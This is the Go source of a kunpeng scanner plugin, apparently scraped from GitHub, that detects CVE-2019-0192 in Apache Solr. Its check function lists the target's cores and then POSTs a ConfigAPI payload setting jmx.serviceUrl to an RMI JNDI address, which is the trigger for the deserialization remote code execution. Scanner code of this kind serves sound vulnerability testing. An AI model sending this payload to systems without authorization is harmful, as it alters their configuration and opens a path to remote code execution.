/
apacheSolrRCE.go
83 lines (78 loc) · 2.03 KB
/
apacheSolrRCE.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
package goplugin
import (
"encoding/json"
"net/http"
"strings"
"github.com/opensec-cn/kunpeng/plugin"
"github.com/opensec-cn/kunpeng/util"
)
type apacheSolrRCE struct {
info plugin.Plugin
result []plugin.Plugin
}
func init() {
plugin.Regist("solr", &apacheSolrRCE{})
}
func (d *apacheSolrRCE) Init() plugin.Plugin {
d.info = plugin.Plugin{
Name: "Apache Solr ConfigAPI 远程代码执行",
Remarks: "ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。 通过将其指向恶意RMI服务器,攻击者可以利用Solr的不安全反序列化来触发Solr端的远程代码执行。",
Level: 0,
Type: "RCE",
Author: "wolf",
References: plugin.References{
URL: "https://www.seebug.org/vuldb/ssvid-97850",
CVE: "CVE-2019-0192",
KPID: "KP-0080",
},
}
return d.info
}
func (d *apacheSolrRCE) GetResult() []plugin.Plugin {
var result = d.result
d.result = []plugin.Plugin{}
return result
}
func (d *apacheSolrRCE) Check(URL string, meta plugin.TaskMeta) bool {
poc := `{"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://127.0.0.1:56411/vultest"}}`
var configURL string
request, err := http.NewRequest("GET", URL+"/solr/admin/cores?wt=json", nil)
if err != nil {
return false
}
resp, err := util.RequestDo(request, false)
if err != nil {
return false
}
var core map[string]interface{}
err = json.Unmarshal(resp.Body, &core)
if err != nil {
return false
}
if _, ok := core["status"]; !ok {
return false
}
for k := range core["status"].(map[string]interface{}) {
configURL = "/solr/" + k + "/config"
break
}
if len(configURL) == 0 {
return false
}
request, err = http.NewRequest("POST", URL+configURL, strings.NewReader(poc))
if err != nil {
return false
}
resp, err = util.RequestDo(request, true)
if err != nil {
return false
}
if strings.Contains(resp.ResponseRaw, "[rmi://127.0.0.1:56411/vultest]") {
result := d.info
result.Response = resp.ResponseRaw
result.Request = resp.RequestRaw
d.result = append(d.result, result)
return true
}
return false
}